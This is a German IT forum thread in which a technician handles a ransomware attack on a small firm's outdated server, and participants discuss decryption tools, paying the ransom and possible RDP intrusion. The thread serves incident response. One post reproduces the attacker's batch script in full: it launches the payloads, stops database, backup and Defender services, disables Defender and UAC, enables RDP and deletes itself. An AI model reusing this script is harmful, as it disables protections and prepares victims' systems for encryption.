Jump to content
Squire

Ransomware - Server verschlüsselt

Recommended Posts

Hallo Leute,

 

ich kann das Jahr gleich mit einer kleinen Herausforderung anfangen.

 

Am 31.12. wurde ich von einem Neukunden angerufen, dass sein Server verschlüsselt ist ...

 

Wie sich herrausstellte - absoluter worst case ... alles was man nicht machen sollte liegt hier vor ...

 

Kleine Firma, die mit - festhalten - Windows 2011 HomeServer (EOL 2016) arbeitet

Backup des ERP Systems liegt nur auf dem Server (auf nem 2. Raid1)

Virenschutz ... irgend ein ComodoAV ... uralt von 2013 ...

H-Mailserver mit Mailstore Home (nicht revisionssicher und für betriebliche Nutzung lizenzrechtlich nicht erlaubt)

 

Es gibt kein Backup, auch kein Teilbackup. Die verschlüsselten Dateien weisen die Endung .cryptolocker auf. Laut NoRansomwareProjekt würde das auf CryptXXX V1-V3 hinweisen ... Das Entschlüsselungstool von Trendmicro versagt allerdings

 

der Erpressertext lautet:

 

Zitat

Welcome.

All files on your network have been encrypted. 
Backups were also encrypted or deleted.

This process hasnt corrupted your files, it just modified them. Please note that this modification is reversible.
...........

 

 

Glück im Unglück ... es scheint, dass die SQL DB des ERP Programms nicht verschlüsselt ist ... und dass die bis 7.1. Werksurlaub haben ...

 

ich werd die Kiste jetzt erst mal abgesichert hochfahren und die Ransomware beseitigen ... 

 

Achja ... die Polizei hat dringend davon abgeraten "Lösegeld" zu zahlen ... die wollen wohl so um die 4800$ ...

 

 

hat jemand nen Tipp für eine etwaige Entschlüsselung ... ich jeweils einer der Raid1 Platten mittels einer Diskstation auf zwei Platten von mir geklont - damit kann ich dann gefahrlos testen ...

 

Auf alle Fälle erstell ich dem Kunden dann mal ein richtiges IT Konzept und Angebot mit aktueller Hardware, Software, Virenschutz und Backup! 

Die Firma, die das vorher eingerichtet hat - hat schlicht und ergreifend grob fahrlässig gehandelt ... vom lizenzrechtlichen Dingen will ich mal gar nicht erst reden!  ich schüttel immer noch innerlich den Kopf

 

  • Like 1

Share this post


Link to post
Share on other sites

Hi,

 

zumindest einmal die Option zu Zahlen überdenken, in 2 Fällen haben es Kunden von einem Bekannten getan und die Daten waren schnell entschlüsselt...

 

Besser wäre natürlich ein vernünftiges Konzept, dass so etwas nicht passiert.

 

Gruß

J

Share this post


Link to post
Share on other sites
vor 1 Stunde schrieb Squire:

der Erpressertext lautet:

Vielleicht wäre es gut, wenn die Erpresser-Links nicht in einer Nachricht vorhanden sind ;-) Für Kriminelle brauchen wir ja keine Werbung machen.

 

vor 5 Minuten schrieb MrCocktail:

2 Fällen haben es Kunden von einem Bekannten getan

Ohne die Umstände zu kennen, halte ich das vorgehen für äußerst kritisch. In der Masse lohnt sich das dann für die Erpresser und es wird immer so weitergehen.

Share this post


Link to post
Share on other sites

Hast du ein Incident Management mit entsprechenden Prozessen im Rücken?

 

Rein technisch würde ich mir, sofern nicht bereits die malware vorlegt, bei virustotal ein sample von cryptxxx besorgen und versuchen zu analysieren. Dann kann man sehen, wie das ding überhaupt arbeitet.

Edited by SandyB

Share this post


Link to post
Share on other sites

Incident Management ... der war gut :D das bin ich dann wohl selbst

 

ich hab vorhin noch mal andere Dateien gecheckt ... CryptoXXX scheint es nicht zu sein ... da findet kein Decryptor irgendwas ...

Emisoft wirft als Ransomware RAPID aus - dafür gibt es keinen decryptor. 

 

was ich bisher gefunden hab, wie er sich aktiv setzt ... wie das Teil reingekommen ist ist mir noch unklar - der Kunde behauptet nix geklickt zu haben ...

 

ich hab folgende Datei im Download des Admins unter einem Verzeichnis RRR gefunden - die Exes hat er wohl mit einem AV Scan geschreddert

 

del.bat 

 

@echo off
START "" %~dp0\RRLL.exe -all
START "" %~dp0\NS.exe
START "" %~dp0\p.exe

net stop MSSQLServerADHelper100
net stop MSSQL$ISARS
net stop MSSQL$MSFW
net stop SQLAgent$ISARS
net stop SQLAgent$MSFW
net stop SQLBrowser
net stop ReportServer$ISARS
net stop SQLWriter
net stop WinDefend
net stop mr2kserv
net stop MSExchangeADTopology
net stop MSExchangeFBA
net stop MSExchangeIS
net stop MSExchangeSA
net stop ShadowProtectSvc
net stop SPAdminV4
net stop SPTimerV4
net stop SPTraceV4
net stop SPUserCodeV4
net stop SPWriterV4
net stop SPSearch4
net stop MSSQLServerADHelper100
net stop IISADMIN
net stop firebirdguardiandefaultinstance
net stop ibmiasrw
net stop QBCFMonitorService
net stop QBVSS
net stop QBPOSDBServiceV12
net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
net stop IISADMIN
net stop "Simply Accounting Database Connection Manager"
net stop QuickBooksDB1
net stop QuickBooksDB2
net stop QuickBooksDB3
net stop QuickBooksDB4
net stop QuickBooksDB5
net stop QuickBooksDB6
net stop QuickBooksDB7
net stop QuickBooksDB8
net stop QuickBooksDB9
net stop QuickBooksDB10
net stop QuickBooksDB11
net stop QuickBooksDB12
net stop QuickBooksDB13
net stop QuickBooksDB14
net stop QuickBooksDB15
net stop QuickBooksDB16
net stop QuickBooksDB17
net stop QuickBooksDB18
net stop QuickBooksDB19
net stop QuickBooksDB20
net stop QuickBooksDB21
net stop QuickBooksDB22
net stop QuickBooksDB23
net stop QuickBooksDB24
net stop QuickBooksDB25
taskkill /f /im mysql*
taskkill /f /im IBM*
taskkill /f /im bes10*
taskkill /f /im black*
taskkill /f /im sql
taskkill /f /im store.exe
taskkill /f /im sql*
taskkill /f /im vee*
taskkill /f /im postg*
taskkill /f /im sage*
REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f
del %0

 

Edited by Squire

Share this post


Link to post
Share on other sites

Ich würde mir keine großen Hoffnungen mehr machen die Daten irgendwie entschlüsselt zu bekommen.
Meistens hat man noch eine Chance solange der Server/Rechner nicht heruntergefahren wurde, da viele Ransomwares den Key im RAM nicht clearen.
 

Aus betriebswirtschaftlicher Sicht muss man in so einer Situation den Punkt ganz klar überdenken.

vor 4 Stunden schrieb Squire:

Achja ... die Polizei hat dringend davon abgeraten "Lösegeld" zu zahlen ... die wollen wohl so um die 4800$ ...

 

Der Kunde hat seine IT über Jahre wohl total vernachlässigt und steht jetzt mit heruntergelassenen Hosen da, selber schuld.

Share this post


Link to post
Share on other sites

Joar, Insolvenz anmelden wäre mal eine Maßnahme. Oder Lösegeld zahlen. Dad Geschäftsmodell basiert darauf nach Bezahlung zu entschlüsseln. Sonst würde niemand zahlen.

Share this post


Link to post
Share on other sites
vor 1 Minute schrieb DocData:

Joar, Insolvenz anmelden wäre mal eine Maßnahme.

Wer bei 4800$ Insolvenz anmelden muss, der hat wohl ganz andere Probleme :D

 

Die großen Kosten kommen erst danach...

Share this post


Link to post
Share on other sites
vor 9 Minuten schrieb MurdocX:
vor 11 Minuten schrieb DocData:

Joar, Insolvenz anmelden wäre mal eine Maßnahme.

Wer bei 4800$ Insolvenz anmelden muss, der hat wohl ganz andere Probleme :D

Deswegen hat er ja auch geschrieben Insolvenz anmelden (da die Wiederherstellung sehr sehr unwahrscheinlich ist) ODER bezahlen ;)

 

 

Hier noch ein Leitfaden des BSI zum Thema Ransomware:
https://www.bsi.bund.de/DE/Themen/Cyber-Sicherheit/Empfehlungen/Ransomware/Ransomware_node.html

 

Hier noch 2 Links die helfen könnten:
https://www.nomoreransom.org/de/index.html

https://id-ransomware.malwarehunterteam.com/

Edited by falkebo

Share this post


Link to post
Share on other sites
vor 8 Minuten schrieb MurdocX:

Wer bei 4800$ Insolvenz anmelden muss, der hat wohl ganz andere Probleme :D

 

Die großen Kosten kommen erst danach...

Insolvenz kann und muss auch dan angemeldet werden wenn das Unternehmen nachhaltig nicht mehr in der Lage ist den Geschäftsbetrieb aufrecht zu erhalten.

Share this post


Link to post
Share on other sites

No More Ransomware kannte ich schon ...

 

image.thumb.png.5833897a0332c762aa3ef4d4a4c2a4b1.png

 

zumindest scheint die SQL DB nicht verschlüsselt zu sein ... normales MDF File.

 

Was mich jetzt ein wenig wundert ist, dass ich keinen aktiven Trojaner etc. finde ... nix in den Autorun Schlüsseln etc ...

Kann das sein, dass die sich nach erfolgreichen Verschlüsseln selbst wieder rauskicken?

 

Vielleicht ist noch was mit einem SystemRestore Point was zu holen ... ich hatte vorhin den Kunden schon mal telefonisch informiert, dass es dunkel ausschaut ...

Für mich heißt das dann wohl am Wochenende ein hübsches Angebot für Server, Software, Backup, AV und Lizenzen zu machen ... das gibt es nicht für 3.50€

Share this post


Link to post
Share on other sites
vor 3 Minuten schrieb Squire:

Für mich heißt das dann wohl am Wochenende ein hübsches Angebot für Server, Software, Backup, AV und Lizenzen zu machen ... das gibt es nicht für 3.50€ 

Wenn das Kind bereits in den Brunnen gefallen ist, sind die Kunden meistens bereit alles zu bezahlen :D

Share this post


Link to post
Share on other sites

Hi,

 

auch wenn es jetzt b***d klingt, hast du dir die Seite im TOR Browser mal angeschaut?

Meist ist da auch noch ein Link zu Hilfe, und ja, solange die Software wirklich aktiv ist und nicht nur noch Reste durch Zufall durchs Web gehen, entschlüsseln die wirklich und leisten im Zweifel sogar einen nicht so schlechten Support, ob man so etwas jetzt unterstützen will / muss / kann ist dann noch eine andere frage.

Share this post


Link to post
Share on other sites

das muss der Kunde entscheiden, ob er zahlt oder nicht. Ich bin in diesem Fall externer Dienstleister und hab den Kunden vorher auch nicht betreut ... Ich war am 31.12. zum ersten mal bei ihm ...

so wie es ausschaut, hört er auf die Polizei und will nicht zahlen ...

 

Anscheinend wurde er gehackt. Ich hab im Eventlog wurden RDP Verbindungen von externen IPs gelogged. Laut Kunde ist RDP nach außen aber nicht offen ...

 

Edited by Squire

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


Werbepartner:



×
×
  • Create New...